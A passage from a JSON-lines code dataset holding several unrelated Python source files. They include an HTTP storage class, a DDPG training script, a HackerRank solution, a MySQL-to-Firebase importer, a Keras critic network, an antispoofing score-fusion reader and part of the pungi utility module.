'session', None)\n if session:\n asyncio.ensure_future(session.close(), loop=self.loop)\n if kwargs:\n kwargs = {**self.session_params, **kwargs}\n else:\n kwargs = self.session_params\n self.session = client.ClientSession(loop=self.loop, **kwargs)\n\n async def stop(self):\n await self.session.close()\n\n def raw_key(self, key):\n if self._prefix:\n url = self._prefix / key\n elif self._template and isinstance(key, Mapping):\n url = URL(self._template.format_map(key))\n elif self._template and isinstance(key, Sequence):\n url = URL(self._template.format(*key))\n elif self._template:\n url = URL(self._template.format(key))\n elif isinstance(key, str):\n url = URL(key)\n else:\n url = key\n if self._allow_hosts and url.host not in self._allow_hosts:\n raise KeyError(key)\n return url\n\n async def _request(self, url, *, method='get', **kwargs):\n async with self._semaphore:\n coro = getattr(self.session, method)\n async with coro(url, **kwargs) as response:\n if self._format == 'json' and 'json' in response.content_type:\n return response.status, await response.json()\n elif self._format == 'str':\n return response.status, await response.text()\n else:\n return response.status, await response.read()\n\n async def request(self, url, **kwargs):\n try:\n status, data = await self._request(url, **kwargs)\n except ClientOSError as e:\n raise StorageError('URL %s: %s' % (url, e)) from e\n\n if self._return_status:\n return status, data\n\n if status == 404:\n data = None\n elif status >= 400:\n raise StorageError('URL %s: %s' % (url, status))\n return data\n\n def get(self, key):\n url = self.raw_key(key)\n return self.request(url)\n\n async def copy(self, key_source, storage_dest, key_dest):\n \"\"\" Return True if data are copied\n * optimized for http->fs copy\n * not supported return_status\n \"\"\"\n from aioworkers.storage.filesystem import FileSystemStorage\n if not isinstance(storage_dest, FileSystemStorage):\n return super().copy(key_source, storage_dest, key_dest)\n url = self.raw_key(key_source)\n logger = self.context.logger\n async with self._semaphore:\n async with self.session.get(url) as response:\n if response.status == 404:\n return\n elif response.status >= 400:\n if logger.getEffectiveLevel() == logging.DEBUG:\n logger.debug(\n 'HttpStorage request to %s '\n 'returned code %s:\\n%s' % (\n url, response.status,\n (await response.read()).decode()))\n return\n async with storage_dest.raw_key(key_dest).open('wb') as f:\n async for chunk in response.content.iter_any():\n await f.write(chunk)\n return True\n\n\nclass Storage(RoStorage, base.AbstractStorageWriteOnly):\n \"\"\" RW storage over http\n config:\n semaphore: int\n allow_hosts: list\n return_status: bool, method get returns tuple (CODE, VALUE)\n prefix: url prefix\n template: url template\n headers: Mapping or None\n format: [json|str|bytes], default json\n set: [post|put|patch], default post\n dumps: str, path in context to dumps\n \"\"\"\n\n def set(self, key, value):\n url = self.raw_key(key)\n if self._format == 'json':\n if self.config.get('dumps'):\n dumps = self.context[self.config.dumps]\n else:\n dumps = json.dumps\n data = dumps(value)\n headers = {'content-type': 'application/json'}\n else:\n data = value\n headers = {}\n\n return self.request(\n url, method=self.config.get('set', 'post'),\n data=data, headers=headers)\n","repo_name":"xutusheng/di5cheng","sub_path":"di5cheng-IT-PaaS/venv/Lib/site-packages/aioworkers/storage/http.py","file_name":"http.py","file_ext":"py","file_size_in_byte":5798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24602482362","text":"import tensorflow as tf\nimport ReplayBuffer\nimport numpy as np\nimport Actor\nimport Noise\nimport Critic\nimport gym\nimport cv2\nimport utils\nimport time\n\n\n\"\"\"\ndef train_vision(sess, env, actor, critic, actor_noise, batch_size,saver):\n\n #image size :\n\n sess.run(tf.global_variables_initializer())\n\n actor.update_target_network()\n critic.update_target_network()\n\n replay_buffer = ReplayBuffer.ReplayBuffer(100000)\n\n\n for i in range(100000):\n\n if i%100 == 0:\n saver.save(sess,\"/home/duju/git_repos/model.ckpt\")\n\n time_step = env.reset()\n\n\n ep_reward = 0\n\n s = env.physics.render(camera_id=0, width=32, height=24)\n\n while True:\n\n cv2.imshow('Test', utils.RGB2BGR(s))\n cv2.waitKey(delay=1)\n\n a = np.reshape(actor.predict(np.reshape(s, (1, *actor.state_dim))) + actor_noise(), actor.action_dim)\n\n\n time_step = env.step(a[0])\n terminal, r, _, _ = time_step\n\n\n s2 = env.physics.render(camera_id=0, width=32, height=24)\n\n replay_buffer.add(s,a,r, terminal, s2)\n\n if replay_buffer.size() > batch_size:\n s_batch, a_batch, r_batch, t_batch, s2_batch = \\\n replay_buffer.sample_batch(batch_size)\n\n target_q = critic.predict_target(\n s2_batch, actor.predict_target(s2_batch)\n )\n\n y_i = []\n\n for k in range(batch_size):\n\n if t_batch[k].last():\n y_i.append(r_batch[k])\n else:\n y_i.append(r_batch[k] + critic.gamma * target_q[k])\n\n\n\n predicted_q_value, _ = critic.train(\n s_batch, a_batch, np.reshape(y_i,(batch_size,1))\n )\n\n a_outs = actor.predict(s_batch)\n \n grads = critic.action_gradients(s_batch,a_outs)\n actor.train(s_batch, grads[0]) #grads is returned as list of length 1\n\n actor.update_target_network() # Do we do this every time?\n critic.update_target_network()\n\n s = s2\n\n ep_reward += r\n\n if time_step.last():\n print(ep_reward)\n break\n\"\"\"\ndef train_feature(sess, env, actor, critic, actor_noise, batch_size,saver):\n\n #training with low dimensional features\n\n sess.run(tf.global_variables_initializer())\n\n actor.update_target_network()\n critic.update_target_network()\n\n replay_buffer = ReplayBuffer.ReplayBuffer(1000000)\n\n\n for i in range(1000000000):\n\n #if i%1000 == 0:\n # saver.save(sess,\"/home/duju/git_repos/model.ckpt\")\n\n s = env.reset()\n # in the case of suite [step_type, reward, discount, observation]\n # in the case of gym [observation, reward, done, info], gym reset returns observation only\n\n ep_reward = 0\n\n #if i%20 == 0:\n # pass\n #video_saver = utils.VideoSaver(\"/home/duju/git_repos/training.avi\", int(1. / env.control_timestep()), 30, width=320, height=240)\n\n\n done = False\n\n while done != True:\n\n a = actor.predict(np.reshape(s, (1, *actor.state_dim))) + actor_noise()\n a = 3 * a\n\n if(i%100 == 0):\n # pass\n #env.render()\n a = actor.predict(np.reshape(s, (1, *actor.state_dim)))\n a = 3 * a\n #frame = env.physics.render(camera_id=0, width=320, height=240)\n #video_saver.write(utils.RGB2BGR(frame))\n\n #frame = env.physics.render(camera_id=0, width=320, height=240)\n #cv2.imshow('Test', utils.RGB2BGR(frame))\n #cv2.waitKey(delay=1)\n\n\n env.render()\n\n # a : [?, action_dim]\n\n\n time_step = env.step(a[0])\n s2, r, done, _ = time_step\n\n replay_buffer.add(s,np.reshape(a, actor.action_dim),r, done, s2)\n #print((s,np.reshape(a, actor.action_dim),r, done, s2))\n # s : [4], a : [1], r: scalar, done : scalar, s2 : [4]\n\n\n\n if replay_buffer.size() > batch_size:\n s_batch, a_batch, r_batch, t_batch, s2_batch = replay_buffer.sample_batch(batch_size)\n\n target_q = critic.predict_target(\n s2_batch, actor.predict_target(s2_batch)\n )\n # taget_q : [batch_size, 1]\n y_i = []\n\n\n for k in range(batch_size):\n\n if t_batch[k]:\n y_i.append(np.reshape(r_batch[k],(1,)))\n #print(\"ya\", r_batch[k])\n else:\n #print(r_batch[k], critic.gamma, target_q[k])\n y_i.append(r_batch[k] + critic.gamma * target_q[k])\n\n #print(a_batch[k], r_batch[k],y_i[k])\n\n # y_i : [?, batch_size]\n\n predicted_q_value, _ = critic.train(\n s_batch, a_batch, np.reshape(y_i,(batch_size,1))\n )\n #print(predicted_q_value[0],y_i[0])\n\n a_outs = actor.predict(s_batch)\n grads = critic.action_gradients(s_batch,a_outs)\n #print(s_batch.shape)\n #print(a_outs.shape)\n #print(sess.run(critic.network_params[5],feed_dict={critic.inputs: s_batch, critic.action: a_outs})[:10])\n #print(sess.run(tf.gradients(critic.out,critic.inputs),feed_dict={critic.inputs: s_batch,\n #critic.action: a_outs})\n #)\n #print(np.array(grads).shape)\n\n\n actor.train(s_batch, grads[0]) #grads is returned as list of length 1\n\n actor.update_target_network() # Do we do this every time?\n critic.update_target_network()\n\n s = s2\n\n ep_reward += r\n\n if done:\n print(i,\"---\",ep_reward)\n break\n\n if i % 20 == 0:\n pass\n #video_saver.release()\n\n\nif __name__ == '__main__':\n\n batch_size = 64\n tf_config = tf.ConfigProto()\n #tf_config.gpu_options.per_process_gpu_memory_fraction = 0.6\n tf_config.gpu_options.allow_growth = True\n\n saver = tf.train.Saver()\n\n env = gym.make('InvertedPendulum-v2')\n\n #print(env.action_space.high)\n\n with tf.Session(config=tf_config) as sess:\n\n actor = Actor.Actor(sess, [4], 1, 0.0001 , 0.001, batch_size)\n critic = Critic.Critic(sess, [4], 1, 0.001, 0.001, 0.99, actor.get_num_trainable_vars())\n actor_noise = Noise.GaussianNoise()\n\n train_feature(sess, env, actor, critic, actor_noise, batch_size,saver)","repo_name":"ehddnr747/MADDPG","sub_path":"tests/train_gym.py","file_name":"train_gym.py","file_ext":"py","file_size_in_byte":6713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26786283539","text":"#Link: https://www.hackerrank.com/challenges/halloween-sale/problem?h_r=profile\n\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\ndef costOfGame(a, p, d, m):\n \n if p == 0:\n return a\n elif p-d < m :\n return m\n else:\n return p-d\n \n \ndef howManyGames(p, d, m, s): \n \n games = 0\n \n pp = 0\n \n while 1:\n \n if pp == 0:\n pp = costOfGame(p, pp, d, m)\n \n if pp > s:\n break\n else: \n s = s - pp\n games+=1\n else:\n pp = costOfGame(-1, pp, d, m)\n if pp > s:\n break\n else: \n s = s - pp\n games+=1\n \n return games\n \n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n pdms = input().split()\n\n p = int(pdms[0])\n\n d = int(pdms[1])\n\n m = int(pdms[2])\n\n s = int(pdms[3])\n\n answer = howManyGames(p, d, m, s)\n\n fptr.write(str(answer) + '\\n')\n\n fptr.close()\n","repo_name":"AmitabhaSaha/HackerRankSolutions","sub_path":"Halloween_Sale.py","file_name":"Halloween_Sale.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22589977864","text":"from src.word2vec import get_word_embedding\nimport numpy as np\nimport math\nimport torch\nimport time\nimport pickle\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nimport nltk\nnltk.download('stopwords')\nstop_words = set(stopwords.words('english'))\n\ndef calculate_ys(sentence, E, unique_words):\n sentence = word_tokenize(sentence)\n process_sent = []\n for i in sentence:\n if i not in stop_words:\n process_sent.append(i)\n ys = 0\n for i in process_sent:\n ys += get_word_embedding(i, E, unique_words)\n\n return ys/len(process_sent)\n\ndef calculate_di(word, M, ys, E, unique_words):\n\n ew = get_word_embedding(word, E, unique_words)\n\n ew = np.asarray(ew)\n ew = torch.from_numpy(ew)\n ys = np.asarray(ys)\n ys = torch.from_numpy(ys)\n # print(ew)\n # ew = ew.t()\n # print(ew)\n interm = torch.matmul(ew, M)\n\n return torch.matmul(interm, ys)\n\ndef calculate_ai(word, sentence, M, ys, E, unique_words):\n num = math.exp(calculate_di(word, M, ys, E, unique_words))\n denom = 0\n for i in sentence:\n denom+= math.exp(calculate_di(i, M, ys, E, unique_words))\n\n return num/denom\n\ndef calculate_zs(sentence, M, ys, E, unique_words):\n sentence = word_tokenize(sentence)\n process_sent = []\n for i in sentence:\n if i not in stop_words:\n process_sent.append(i)\n zs = 0\n for word in process_sent:\n zs+= calculate_ai(word, process_sent, M, ys, E, unique_words) * get_word_embedding(word, E, unique_words)\n\n return zs\n\nif __name__ == '__main__':\n M = np.random.randn(200, 200)\n\n infile = open('unique_words.pickle','rb')\n unique_words = pickle.load(infile)\n infile.close()\n # print(unique_words)\n # print(unique_words.index('charge'))\n infile = open('reviews.pickle','rb')\n reviews = pickle.load(infile)\n infile.close()\n\n infile = open('E.pickle','rb')\n E = pickle.load(infile)\n infile.close()\n\n start = time.time()\n\n ys = calculate_ys(reviews[1], E, unique_words)\n\n print(calculate_zs(reviews[1], M, ys, E, unique_words))\n\n print(time.time() - start)\n","repo_name":"vam-sin/ABAE","sub_path":"src/sent_embeddings.py","file_name":"sent_embeddings.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72314157530","text":"import mysql.connector\nimport sys\nimport json\nimport requests\nimport re\nimport decimal\nfrom django.core.serializers.json import DjangoJSONEncoder\n\n\nclass DecimalEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, decimal.Decimal):\n return float(o)\n return super(DecimalEncoder, self).default(o)\n\ndb=sys.argv[1]\nnode=sys.argv[2]\ncnx=mysql.connector.connect(user='inf551',password='inf551',host='localhost',database=db)\ncursor = cnx.cursor(buffered=True)\n\nget_tb=(f\"use {db}\")\nshow_tb=(\"show tables\")\ncursor.execute(get_tb)\ncursor.execute(show_tb)\ntable=[]\nfor c in cursor:\n table.append(c[0])\nindex_dic={}\nfor t in table:\n print(t)\n query=(f\"select * from {t}\")\n cursor.execute(query)\n s=''\n count=0\n colum_tuple=cursor.column_names\n col=[]\n for c in colum_tuple:\n col.append(c)\n if t=='aliases':\n col[0]='AId'\n elif t=='emailreceivers':\n col[0]='ERId'\n elif t=='emails':\n col[0]='EId'\n primary_key = col[0]\n data=[]\n if db == 'hillary':\n if t == 'emailreceivers':\n t = 'EmailReceivers'\n else:\n t = t.capitalize()\n elif t == 'dept_emp':\n t = 'department_emp'\n elif t == 'dept_manager':\n t = 'department_manag'\n for n in cursor:\n n=dict(zip(col,n))\n data.append(n)\n count+=1\n if count>300 and t=='Emails':\n break\n elif db=='employees' and count>3000:\n break\n else:\n for key,val in n.items():\n try:\n val = val.split(' ')\n for v in val:\n a = ''.join(re.findall('[a-zA-Z]+', v))\n a = a.lower()\n dic_temp = {}\n if a != '':\n if a not in index_dic:\n dic_temp['TABLE'] = t\n dic_temp['COLUMN'] = key\n dic_temp[primary_key] = n[primary_key]\n index_dic[a] = []\n index_dic[a].append(dic_temp)\n else:\n dic_temp['TABLE'] = t\n dic_temp['COLUMN'] = key\n dic_temp[primary_key] = n[primary_key]\n index_dic[a].append(dic_temp)\n except AttributeError:\n pass\n\n json_d = json.dumps(data, sort_keys=True, indent=4,cls=DjangoJSONEncoder)\n\n url = f\"https://inf551-28882.firebaseio.com/{node}/{t}.json\"\n response = requests.put(url, json_d)\n\njson_ind=json.dumps(index_dic, sort_keys=True, indent=4,cls=DecimalEncoder)\nurl = f\"https://inf551-28882.firebaseio.com/{node}/index.json\"\nresponse = requests.put(url, json_ind)\n","repo_name":"zylzulu/Explore-your-data","sub_path":"import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5636018755","text":"# 백준 15829번 Hashing\n# 해싱이란..\n# 대부분의 탐색 방법들은 탐색 키를 저장된 키 값과 반복적으로 비교하면서 탐색을 원하는 항목에 접근한다.\n# 반면 해싱은 키 값에 직접 산술적인 연산을 적용하여 항목이 저장되어 있는 테이블의 주소를 계산하여 항목에 접근한다.\n# 이렇게 키 값의 연산에 의해 직접 접근이 가능한 구조를 해시테이블이라 부르고,\n# 해시테이블을 이용한 탐색을 해싱(hashing)이라 한다.\n\n# 31과 1234567891은 문제에서 주어진 값\nn = int(input())\ns = input()\nresult = 0\nfor i in range(n):\n # 아스키코드 문자를 숫자로 => ord\n # 숫자를 문자로 => chr\n result += ((ord(s[i])-96) * 31**i)\n\n# 결과값으로 1234567891로 나눈 나머지값 출력\nprint(result%1234567891)","repo_name":"yangseokju/ALGORITHM","sub_path":"22.12/15829.py","file_name":"15829.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18515889391","text":"from common import text_url, parse, gather_with_concurrency, post_async\nfrom config import thetextapikey\nfrom word_cloud import word_cloud\n\ndef make_word_cloud(year, month):\n text = parse(year, month)\n word_cloud(text, f\"wordclouds/{year}_{month}.png\")\n \nfor year in [2020, 2021]:\n for month in range(12):\n if year == 2020 and month < 3:\n continue\n make_word_cloud(year, month+1)\n","repo_name":"ytang07/nyt","sub_path":"covid/covid_word_clouds.py","file_name":"covid_word_clouds.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"1063274389","text":"from keras.models import Model,Sequential\nfrom keras.layers import Dense,Input,Concatenate, Lambda,Activation,dot\nfrom keras import optimizers\nimport numpy \nfrom keras.constraints import Constraint\nfrom keras import backend as K\nimport gym\nimport utils\nimport buffer_class\nimport random\nimport sys\n\nclass critic:\n\n\tdef __init__(self,params,env,state_size,action_size):\n\t\tself.env=env\n\t\tself.params=params\n\t\tself.state_size=state_size\n\t\tself.action_size=action_size\n\t\tself.network=self.create_network()\n\t\tself.num_updates=0\n\t\tself.target_network=self.create_network()\n\t\tself.target_network.set_weights(self.network.get_weights())\n\t\t#self.buffer_object=buffer_class.buffer_class(max_length=self.params['max_buffer_size'])\n\t\t\n\tdef create_network(self):\n\t\tstate_input=Input(shape=(self.state_size,))\n\t\taction_input=Input(shape=(self.action_size,))\n\t\tmerged=Concatenate(axis=-1)([state_input,action_input])\n\t\t#define the network\n\t\th=merged\n\t\tfor _ in range(self.params['num_layers']-1):\t\n\t\t\th = Dense(self.params['layer_size'],activation='relu')(h)\n\t\tfinal_q=Dense(1)(h)\n\n\t\tmodel = Model(inputs=[state_input, action_input], outputs=final_q)\n\t\tif self.params['opt']=='rmsprop':\n\t\t\topt = optimizers.RMSprop(lr=self.params['learning_rate'])\n\t\telif self.params['opt']=='adam':\n\t\t\topt = optimizers.Adam(lr=self.params['learning_rate'])\n\t\tmodel.compile(loss='mse',optimizer=opt)\n\t\treturn model\n\n\tdef update(self,buffer_object,target_actor):\n\t\t#should be changed\n\t\t'''\n\t\t1-samples a bunch of tuples from the buffer\n\t\t2-to compute a*, randomly initializes some a, then does gradien ascent to improve them\n\t\t3-gets Q corresponding with best action fro previous step\n\t\t4-then performs Q-learning update\n\t\t5-from time to time, syncs target network\n\t\t'''\n\t\tif len(buffer_object.storage)\n#Oct 01 14:12:00 CEST 2012\n\n\"\"\"\nThis script is an utility for prepate scores for fusion\n\n\"\"\"\n\nimport bob\nimport numpy\n\nfrom antispoofing.utils.helpers import *\n\nclass ScoreFusionReader:\n \"\"\"\n Class that read scores for fuse countermeasures.\n \"\"\"\n\n def __init__(self,scoreObjects,scoresDir):\n \"\"\"\n Receive a list file objects (xbob.db.files) and path for the scores directories\n \"\"\"\n \n if(len(scoreObjects) <=0):\n raise ScoreFusionReaderException(\"There is no scores in the list.\")\n \n if(len(scoresDir) <=0):\n raise ScoreFusionReaderException(\"The score directories must be provided.\")\n\n self.scoreObjects = scoreObjects\n self.scoresDir = scoresDir\n\n #Checking if the number of scores of each set of scores are the same\n scoreReader = ScoreReader(scoreObjects,scoresDir[0])\n self.numberOfScores = len(scoreReader.getScores(onlyValidScores=False))\n\n for i in range(1,len(scoresDir)): \n scoreReader = ScoreReader(scoreObjects,scoresDir[i])\n\n if(self.numberOfScores != len(scoreReader.getScores(onlyValidScores=False))):\n raise ScoreFusionReaderException(\"The number of scores in each directory does not mach.\")\n \n\n def __str__(self):\n return \" - There are {0} scores extracted from {1} videos of {2} different countermeasures\".format(self.numberOfScores,len(self.scoreObjects),len(self.scoresDir))\n\n\n def getNumberCountermeasures(self):\n \"\"\"\n Return the number of Countermeasures\n \"\"\"\n return len(self.scoresDir)\n\n\n def getConcatenetedScores(self,onlyValidScores=True):\n \"\"\"\n Get the scores from different sources an concatenate them returning in a numpy.ndarray format\n\n onlyValidScores Will consider only the not nan scores\n \"\"\"\n\n scoreReader = ScoreReader(self.scoreObjects,self.scoresDir[0])\n scores = scoreReader.getScores(onlyValidScores=False)\n concatenatedScores = numpy.reshape(scores,(len(scores),1))\n\n for i in range(1,len(self.scoresDir)):\n scoresReader = ScoreReader(self.scoreObjects,self.scoresDir[i])\n scores = scoresReader.getScores(onlyValidScores=False)\n scores = numpy.reshape(scores,(len(scores),1))\n concatenatedScores = numpy.concatenate((concatenatedScores,scores),axis=1)\n\n #Will remove the Nan data\n if(onlyValidScores):\n nanLines = numpy.array([numpy.sum(numpy.isnan(concatenatedScores[j,:])) for j in range(concatenatedScores.shape[0])])\n nanLines = numpy.where(nanLines>0)[0]\n\n #removing the lines with nan\n concatenatedScores = numpy.delete(concatenatedScores,nanLines,axis=0)\n \n concatenatedScores = numpy.array(concatenatedScores,copy=True,order='C',dtype='float')\n\n return concatenatedScores\n\n def getScoresByIndex(self,index):\n \"\"\"\n Get an specific set of scores by index\n \"\"\"\n\n if((index < 0) or (index > self.getNumberCountermeasures() )):\n raise ScoreFusionReaderException(\"Index out of bounds. There are only {0} countermeasures of score\".format(self.getNumberCountermeasures()))\n\n scoreReader = ScoreReader(self.scoreObjects,self.scoresDir[index])\n scores = scoreReader.getScores()\n scores = numpy.reshape(scores,(len(scores)))\n\n return scores\n\n\nclass ScoreFusionReaderException(Exception):\n def __init__(self, value):\n self.value = value\n def __str__(self):\n return repr(self.value)\n\n\n","repo_name":"rogerils/antispoofing.utils","sub_path":"antispoofing/utils/fusion/score_fusion_reader.py","file_name":"score_fusion_reader.py","file_ext":"py","file_size_in_byte":3486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12170262692","text":"from typing import List\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n if(len(prices)==0):\n return 0\n profit = 0\n for i in range(len(prices)-1):\n if(prices[i+1] > prices[i]):\n profit += prices[i+1] - prices[i]\n return profit \n\nsol = Solution()\narr = [1,2,3,4,5]\nprint(sol.maxProfit(arr))\n ","repo_name":"KnightApu/Leetcode-30days-challenge","sub_path":"week-1/besttimetobuystock.py","file_name":"besttimetobuystock.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23287591526","text":"# -*- coding: utf-8 -*-\n\n\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; version 2 of the License.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Library General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, see .\n\nimport argparse\nimport json\nimport subprocess\nimport os\nimport shutil\nimport string\nimport sys\nimport hashlib\nimport errno\nimport re\nimport contextlib\nimport traceback\nimport tempfile\nimport time\nimport functools\nfrom six.moves import urllib, range, shlex_quote\n\nimport kobo.conf\nfrom kobo.shortcuts import run, force_list\nfrom kobo.threads import WorkerThread, ThreadPool\nfrom productmd.common import get_major_version\nfrom pungi.module_util import Modulemd\n\n# Patterns that match all names of debuginfo packages\nDEBUG_PATTERNS = [\"*-debuginfo\", \"*-debuginfo-*\", \"*-debugsource\"]\nDEBUG_PATTERN_RE = re.compile(\n r\"^(?:.*-debuginfo(?:-.*)?|.*-debuginfo-.*|.*-debugsource)$\"\n)\n\n\ndef _doRunCommand(\n command,\n logger,\n rundir=\"/tmp\",\n output=subprocess.PIPE,\n error=subprocess.PIPE,\n env=None,\n):\n \"\"\"Run a command and log the output. Error out if we get something on stderr\"\"\"\n\n logger.info(\"Running %s\" % subprocess.list2cmdline(command))\n\n p1 = subprocess.Popen(\n command,\n cwd=rundir,\n stdout=output,\n stderr=error,\n universal_newlines=True,\n env=env,\n close_fds=True,\n )\n (out, err) = p1.communicate()\n\n if out:\n logger.debug(out)\n\n if p1.returncode != 0:\n logger.error(\"Got an error from %s\" % command[0])\n logger.error(err)\n raise OSError(\n \"Got an error (%d) from %s: %s\" % (p1.returncode, command[0], err)\n )\n\n\ndef _link(local, target, logger, force=False):\n \"\"\"Simple function to link or copy a package, removing target optionally.\"\"\"\n\n if os.path.exists(target) and force:\n os.remove(target)\n\n # check for broken links\n if force and os.path.islink(target):\n if not os.path.exists(os.readlink(target)):\n os.remove(target)\n\n try:\n os.link(local, target)\n except OSError as e:\n if e.errno != 18: # EXDEV\n logger.error(\"Got an error linking from cache: %s\" % e)\n raise OSError(e)\n\n # Can't hardlink cross file systems\n shutil.copy2(local, target)\n\n\ndef _ensuredir(target, logger, force=False, clean=False):\n \"\"\"Ensure that a directory exists, if it already exists, only continue\n if force is set.\"\"\"\n\n # We have to check existence of a logger, as setting the logger could\n # itself cause an issue.\n def whoops(func, path, exc_info):\n message = \"Could not remove %s\" % path\n if logger:\n logger.error(message)\n else:\n sys.stderr(message)\n sys.exit(1)\n\n if os.path.exists(target) and not os.path.isdir(target):\n message = \"%s exists but is not a directory.\" % target\n if logger:\n logger.error(message)\n else:\n sys.stderr(message)\n sys.exit(1)\n\n if not os.path.isdir(target):\n os.makedirs(target)\n elif force and clean:\n shutil.rmtree(target, onerror=whoops)\n os.makedirs(target)\n elif force:\n return\n else:\n message = \"Directory %s already exists. Use --force to overwrite.\" % target\n if logger:\n logger.error(message)\n else:\n sys.stderr(message)\n sys.exit(1)\n\n\ndef _doCheckSum(path, hash, logger):\n \"\"\"Generate a checksum hash from a provided path.\n Return a string of type:hash\"\"\"\n\n # Try to figure out what hash we want to do\n try:\n sum = hashlib.new(hash)\n except ValueError:\n logger.error(\"Invalid hash type: %s\" % hash)\n return False\n\n # Try to open the file, using binary flag.\n try:\n myfile = open(path, \"rb\")\n except IOError as e:\n logger.error(\"Could not open file %s: %s\" % (path, e))\n return False\n\n # Loop through the file reading chunks at a time as to not\n # put the entire file in memory. That would suck for DVDs\n while True:\n chunk = myfile.read(\n 8192\n ) # magic number! Taking suggestions for better blocksize\n if not chunk:\n break # we're done with the file\n sum.update(chunk)\n myfile.close()\n\n return \"%s:%s\" % (hash, sum.hexdigest())\n\n\ndef makedirs(path, mode=0o775):\n try:\n os.makedirs(path, mode=mode)\n except OSError as ex:\n if ex.errno != errno.EEXIST:\n raise\n\n\ndef rmtree(path, ignore_errors=False, onerror=None):\n \"\"\"shutil.rmtree ENOENT (ignoring no such file or directory) errors\"\"\"\n try:\n shutil.rmtree(path, ignore_errors, onerror)\n except OSError as ex:\n if ex.errno != errno.ENOENT:\n raise\n\n\ndef explode_rpm_package(pkg_path, target_dir):\n \"\"\"Explode a rpm package into target_dir.\"\"\"\n pkg_path = os.path.abspath(pkg_path)\n makedirs(target_dir)\n try:\n # rpm2archive writes to stdout only if reading from stdin, thus the redirect\n run(\n \"rpm2archive - <%s | tar xfz - && chmod -R a+rX .\" % shlex_quote(pkg_path),\n workdir=target_dir,\n )\n except RuntimeError:\n # Fall back to rpm2cpio in case rpm2archive failed (most likely due to\n # not being present on the system).\n run(\n \"rpm2cpio %s | cpio -iuvmd && chmod -R a+rX .\" % shlex_quote(pkg_path),\n workdir=target_dir,\n )\n\n\ndef pkg_is_rpm(pkg_obj):\n if pkg_is_srpm(pkg_obj):\n return False\n if pkg_is_debug(pkg_obj):\n return False\n return True\n\n\ndef pkg_is_srpm(pkg_obj):\n if isinstance(pkg_obj, str):\n # string, probably N.A, N-V-R.A, N-V-R.A.rpm\n for i in (\".src\", \".nosrc\", \".src.rpm\", \".nosrc.rpm\"):\n if pkg_obj.endswith(i):\n return True\n else:\n # package object\n if pkg_obj.arch in (\"src\", \"nosrc\"):\n return True\n return False\n\n\ndef pkg_is_debug(pkg_obj):\n if pkg_is_srpm(pkg_obj):\n return False\n\n if isinstance(pkg_obj, str):\n # string\n name = pkg_obj\n else:\n name = pkg_obj.name\n\n return DEBUG_PATTERN_RE.match(name)\n\n\n# format: [(variant_uid_regex, {arch|*: [data]})]\ndef get_arch_variant_data(conf, var_name, arch, variant, keys=None):\n result = []\n for conf_variant, conf_data in conf.get(var_name, []):\n if variant is not None and not re.match(conf_variant, variant.uid):\n continue\n for conf_arch in conf_data:\n if conf_arch != \"*\" and conf_arch != arch:\n continue\n if conf_arch == \"*\" and arch == \"src\":\n # src is excluded from '*' and needs to be explicitly\n # added to the mapping\n continue\n if keys is not None:\n keys.add(conf_variant)\n if isinstance(conf_data[conf_arch], list):\n result.extend(conf_data[conf_arch])\n else:\n result.append(conf_data[conf_arch])\n return result\n\n\ndef is_arch_multilib(conf, arch):\n \"\"\"Check if at least one variant has multilib enabled on this variant.\"\"\"\n return bool(get_arch_variant_data(conf, \"multilib\", arch, None))\n\n\ndef _get_git_ref(fragment):\n if fragment == \"HEAD\":\n return fragment\n if fragment.startswith(\"origin/\"):\n branch = fragment.split(\"/\", 1)[1]\n return \"refs/heads/\" + branch\n return None\n\n\nclass GitUrlResolveError(RuntimeError):\n pass\n\n\ndef resolve_git_ref(repourl, ref):\n \"\"\"Resolve a reference in a Git repo to a commit.\n\n Raises RuntimeError if there was an error. Most likely cause is failure to\n run git command.\n \"\"\"\n if re.match(r\"^[a-f0-9]{40}$\", ref):\n # This looks like a commit ID already.\n return ref\n try:\n _, output = git_ls_remote(repourl, ref)\n except RuntimeError as e:\n raise GitUrlResolveError(\n \"ref does not exist in remote repo %s with the error %s %s\"\n % (repourl, e, e.output)\n )\n\n lines = []\n for line in output.split(\"\\n\"):\n # Keep only lines that represent branches and tags, and also a line for\n # currently checked out HEAD. The leading tab is required to\n # distinguish it from HEADs that could exist in remotes.\n if line and (\"refs/heads/\" in line or \"refs/tags/\" in line or \"\\tHEAD\" in line):\n lines.append(line)\n if len(lines) == 0:\n # Branch does not exist in remote repo\n raise GitUrlResolveError(\n \"Failed to resolve %s: ref does not exist in remote repo\" % repourl\n )\n if len(lines) != 1:\n # This should never happen. HEAD can not match multiple commits in a\n # single repo, and there can not be a repo without a HEAD.\n raise GitUrlResolveError(\"Failed to resolve %r in %s\" % (ref, repourl))\n\n return 